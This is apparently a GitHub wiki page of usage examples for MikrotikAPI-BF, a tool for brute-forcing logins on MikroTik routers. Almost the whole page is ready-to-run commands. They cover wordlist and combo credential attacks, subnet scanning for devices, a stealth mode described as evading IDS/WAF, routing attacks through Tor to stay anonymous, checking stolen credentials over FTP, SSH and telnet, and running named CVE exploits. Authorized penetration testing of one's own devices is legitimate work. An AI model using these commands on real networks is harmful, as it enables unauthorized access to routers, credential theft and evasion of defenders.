Usage Examples - mrhenrike/MikrotikAPI-BF GitHub Wiki

Usage Examples

Language: English · Português (pt-BR)


Basic Credential Tests

# Single username + password
python mikrotikapi-bf.py -t 192.168.88.1 -U admin -P admin

# Try admin with empty password
python mikrotikapi-bf.py -t 192.168.88.1 -U admin -P ""

# Try multiple combos from a combo file
python mikrotikapi-bf.py -t 192.168.88.1 -d examples/combos.txt --progress

Wordlist Attacks

# Separate username + password wordlists
python mikrotikapi-bf.py -t 192.168.88.1 \
  -u examples/usernames.txt \
  -p examples/passwords.txt \
  --progress

# Custom wordlists
python mikrotikapi-bf.py -t 192.168.88.1 \
  -u /path/to/users.txt \
  -p /path/to/pass.txt \
  --threads 10 \
  --progress

Network Discovery

# Discover all Mikrotik devices on a /24 subnet
python mikrotikapi-bf.py --discover -n 192.168.1.0/24 --threads 50 --progress

# Output discovered IPs to file for later use
python mikrotikapi-bf.py --discover -n 192.168.1.0/24 -o discovered_hosts.txt

Stealth Mode

# Fibonacci delays + User-Agent rotation (evade IDS/WAF)
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --stealth

# Set custom delay range
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --stealth --delay-min 2 --delay-max 8

Proxy / Tor

# Route through Tor (anonymize)
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt \
  --proxy socks5://127.0.0.1:9050 \
  --threads 1 \
  --progress

# Route through HTTP proxy
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt \
  --proxy http://proxy.example.com:8080

Post-Login Validation

# After finding credentials, validate access via other services
python mikrotikapi-bf.py -t 192.168.88.1 -U admin -P found_password \
  --validate ftp,ssh,telnet \
  --progress \
  -vv

Session Resume

# Start attack with auto-save sessions
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --session my_attack

# Resume a previously interrupted attack
python mikrotikapi-bf.py --resume my_attack

Export and Reporting

# Export to all formats (JSON, CSV, XML, TXT)
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --export-all

# Export to specific format
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --export-json
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --export-csv

# Generate professional audit report
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --export-all --audit-report

# Custom export directory
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt \
  --export-all \
  --export-dir /tmp/audit_results

Fingerprinting

# Fingerprint only (no attack)
python mikrotikapi-bf.py -t 192.168.88.1 --fingerprint

# Fingerprint + CVE lookup
python mikrotikapi-bf.py -t 192.168.88.1 --fingerprint --nvd

Configuration File

# Run from YAML config
python mikrotikapi-bf.py --config config.yaml

Example config.yaml:

target: 192.168.88.1
combo_file: examples/combos.txt
stealth: true
threads: 5
export: [json, csv]
audit_report: true


Run Specific Exploit (v3.10.0+)

python mikrotikapi-bf.py -t 192.168.88.1 --run-exploit CVE-2018-14847
python mikrotikapi-bf.py -t 192.168.88.1 --run-exploit CVE-2023-30799 -U admin -P pass

8-Phase Security Audit (v3.10.0+)

python mikrotikapi-bf.py -t 192.168.88.1 --audit -U admin -P pass --export sarif
python mikrotikapi-bf.py -t 192.168.88.1 --audit -U admin -P pass --export-all

Delay Profiles (v3.6.0+)

python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --delay-mode high
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --delay-mode stealth
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --delay-mode custom -s 0.5

See also: API Reference · Stealth Mode · Export